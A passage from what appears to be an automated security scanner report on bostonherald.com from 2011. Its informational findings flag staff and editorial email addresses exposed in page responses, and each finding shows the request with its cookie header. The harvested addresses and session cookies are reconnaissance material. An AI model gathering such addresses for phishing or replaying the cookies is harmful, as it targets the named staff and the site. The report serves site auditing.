Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:05:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 46834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<a href="mailto:jverniere@bostonherald.com">
...[SNIP]...
<div id="articleTagline" style="display:block">-jverniere@bostonherald.com</div>
...[SNIP]...

21.42. http://www.bostonherald.com/entertainment/movies/reviews/view/20110128killermoves_statham_fine-tunes_mechanic_mayhem/srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /entertainment/movies/reviews/view/20110128killermoves_statham_fine-tunes_mechanic_mayhem/srvc=home&position=also

Issue detail

The following email addresses were disclosed in the response:

Request

GET /entertainment/movies/reviews/view/20110128killermoves_statham_fine-tunes_mechanic_mayhem/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:06:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 45677

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<a href="mailto:jverniere@bostonherald.com">
...[SNIP]...
<div id="articleTagline" style="display:block">-jverniere@bostonherald.com</div>
...[SNIP]...

21.43. http://www.bostonherald.com/entertainment/music/general/view/20110128banditas_singer_rocks_the_boat/srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /entertainment/music/general/view/20110128banditas_singer_rocks_the_boat/srvc=home&position=also

Issue detail

The following email address was disclosed in the response:

Request

GET /entertainment/music/general/view/20110128banditas_singer_rocks_the_boat/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:11:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 45804

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="articleTagline" style="display:none">jgottlieb@bostonherald.com</div>
...[SNIP]...

21.44. http://www.bostonherald.com/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also

Issue detail

The following email address was disclosed in the response:

Request

GET /jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:03:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 58499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<a href="mailto:jvansack@bostonherald.com">
...[SNIP]...
<a href="mailto:jvansack@bostonherald.com">jvansack@bostonherald.com</a>
...[SNIP]...

21.45. http://www.bostonherald.com/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/srvc=home&position=also

Issue detail

The following email address was disclosed in the response:

Request

GET /jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:03:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 41900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<a href="mailto:jvansack@bostonherald.com">
...[SNIP]...
<a href="mailto:jvansack@bostonherald.com">jvansack@bostonherald.com</a>
...[SNIP]...

21.46. http://www.bostonherald.com/mediacenter/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mediacenter/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /mediacenter/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:55:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 450904

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Photos & Video - Boston
...[SNIP]...
<img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110113/stp/492776_Congresswoman_Shot_Obama__trose@heraldinteractive.com_43.jpg" alt="Photo" />
...[SNIP]...
<img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110116/stp/54c191_Seahawks_Bears_Football__trose@heraldinteractive.com_24.jpg" alt="Photo" />
...[SNIP]...

21.47. http://www.bostonherald.com/mediacenter/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mediacenter/index.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /mediacenter/index.php HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:55:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 450914

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Photos & Video - Boston
...[SNIP]...
<img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110113/stp/492776_Congresswoman_Shot_Obama__trose@heraldinteractive.com_43.jpg" alt="Photo" />
...[SNIP]...
<img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110116/stp/54c191_Seahawks_Bears_Football__trose@heraldinteractive.com_24.jpg" alt="Photo" />
...[SNIP]...

21.48. http://www.bostonherald.com/news/opinion/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/opinion/

Issue detail

The following email address was disclosed in the response:

Request

GET /news/opinion/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:47:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 52277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<a href="mailto:letterstoeditor@bostonherald.com">
...[SNIP]...
<a href="mailto:letterstoeditor@bostonherald.com">letterstoeditor@bostonherald.com</a>
...[SNIP]...

21.49. http://www.bostonherald.com/news/politics/view.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/politics/view.bg

Issue detail

The following email address was disclosed in the response:

Request

GET /news/politics/view.bg?articleid=1312665&srvc=home&position=comment HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:29:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44194

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<a href="mailto:hchabot@bostonherald.com">
...[SNIP]...
<div id="articleTagline" style="display:block">-&mdash; hchabot@bostonherald.com</div>
...[SNIP]...

21.50. http://www.bostonherald.com/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=1

Issue detail

The following email address was disclosed in the response:

Request

GET /news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:22:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 93065

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<a href="mailto:hchabot@bostonherald.com">
...[SNIP]...
<div id="articleTagline" style="display:block">-&mdash; hchabot@bostonherald.com</div>
...[SNIP]...

21.51. http://www.bostonherald.com/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/srvc=home&position=1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/srvc=home&position=1

Issue detail

The following email address was disclosed in the response:

Request

GET /news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/srvc=home&position=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:22:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 42440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<a href="mailto:hchabot@bostonherald.com">
...[SNIP]...
<div id="articleTagline" style="display:block">-&mdash; hchabot@bostonherald.com</div>
...[SNIP]...

21.52. http://www.bostonherald.com/news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=0

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=0

Issue detail

The following email address was disclosed in the response:

Request

GET /news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=0 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:21:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 93057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<a href="mailto:hchabot@bostonherald.com">
...[SNIP]...
<div id="articleTagline" style="display:block">-&mdash; hchabot@bostonherald.com</div>
...[SNIP]...

21.53. http://www.bostonherald.com/news/politics/view/20110128speaker_deleo_shakes_up_house/srvc=home&position=0

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/politics/view/20110128speaker_deleo_shakes_up_house/srvc=home&position=0

Issue detail

The following email address was disclosed in the response:

Request

GET /news/politics/view/20110128speaker_deleo_shakes_up_house/srvc=home&position=0 HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
